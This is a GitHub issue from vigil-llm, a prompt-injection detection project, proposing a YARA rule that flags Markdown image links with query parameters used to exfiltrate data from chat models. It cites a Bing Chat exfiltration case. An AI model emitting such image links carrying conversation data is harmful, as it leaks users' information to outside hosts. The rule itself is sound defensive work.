YARA rule for Markdown exfiltration

deadbits / vigil-llm

⚡ Vigil ⚡ Detect prompt injections, jailbreaks, and other potentially risky Large Language Model (LLM) inputs

https://vigil.deadbits.ai/

Apache License 2.0

303 stars 35 forks source link

YARA rule for Markdown exfiltration #23

Closed deadbits closed 1 year ago

deadbits commented 1 year ago

rule MarkdownExfiltration
{
    meta:
        category = "Data Exfiltration"
        description = "Detects Markdown image with query parameters used during data exfiltration"
        author = "Adam M. Swanda"
        references = "https://embracethered.com/blog/posts/2023/bing-chat-data-exfiltration-poc-and-fix/"

    strings:
        $md = /\!\[.+]\(https?://[a-z\.]+/logo\.png\?q=.+\)/
    condition:
        $md
}

something like that but better regex

deadbits commented 1 year ago

https://github.com/deadbits/vigil-llm/blob/main/data/yara/mdexfil.yar